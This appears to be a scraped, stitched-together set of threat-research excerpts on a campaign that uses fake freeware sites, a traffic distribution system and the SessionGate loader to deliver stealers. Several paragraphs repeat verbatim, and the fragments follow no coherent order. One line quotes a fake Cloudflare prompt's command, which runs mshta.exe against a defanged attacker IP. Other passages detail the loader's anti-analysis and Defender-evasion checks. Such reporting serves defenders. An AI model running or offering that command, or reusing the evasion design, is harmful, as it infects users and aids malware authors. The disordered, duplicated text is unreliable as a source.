SessionGate

Attack chains specifically target users looking for such tools on search engines like Google, causing the bogus sites to be surfaced on top of the search results.

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event. It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely.

Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

The final DLL payload is responsible for communicating with an external server, retrieving an encrypted configuration from the server, extracting the download URL from the configuration, and downloading and silently executing the next-stage malware via 'cmd.exe.'

The HTML page contains obfuscated JavaScript that performs a server-side validation step ... before allowing access to the payload.

The page that imitates a Cloudflare verification screen and instructs the user to run: C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

SessionGate is a multi-stage loader with heavy obfuscation and one-time-key delivery that makes it extraordinarily difficult for analysts to examine.

Cybersecurity researchers have flagged a large-scale operation that impersonates open-source and freeware projects to funnel unsuspecting users through a Traffic Distribution System (TDS) and deliver malware families like Remus Stealer, AnimateClipper, and the SessionGate framework.

The decryption key for the final payload stage is generated server-side and released only once per victim session. If a researcher tries to replay the chain from a different IP address, the server returns a valid-looking but useless key, making the payload completely unreadable.

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

SessionGate , a previously unknown multi-stage, obfuscated loader that's used to deliver potentially unwanted applications (PUA) while incorporating extensive anti-analysis mechanisms to throw off sandboxes by pivoting to a benign installer experience.

The sample also runs multiple environment checks that influence whether it proceeds with malicious delivery or falls back to decoy behavior. The loader checks for the presence of certain services... enumerates running processes... checks system context such as Windows Defender PUA/PUS-related registry settings.

The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

Windows Defender PUA/PUS-related registry settings (e.g., PUAProtection, MpEnablePus)

In addition to services, the loader also enumerates running processes (Toolhelp-based scanning).

Finally, the loader checks system context such as: Windows Defender PUA/PUS-related registry settings ... Windows “Enterprise” edition detection (by inspecting the ProductName string)

SessionGate , a previously unknown multi-stage, obfuscated loader that's used to deliver potentially unwanted applications (PUA) while incorporating extensive anti-analysis mechanisms to throw off sandboxes by pivoting to a benign installer experience.

The sample also runs multiple environment checks that influence whether it proceeds with malicious delivery or falls back to decoy behavior. The loader checks for the presence of certain services... enumerates running processes... checks system context such as Windows Defender PUA/PUS-related registry settings.

The stealer polls the C2 using HTTP POST requests ... The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a 'download' button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping. | The final DLL payload is responsible for communicating with an external server, retrieving an encrypted configuration from the server, extracting the download URL from the configuration, and downloading and silently executing the next-stage malware via 'cmd.exe.'

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.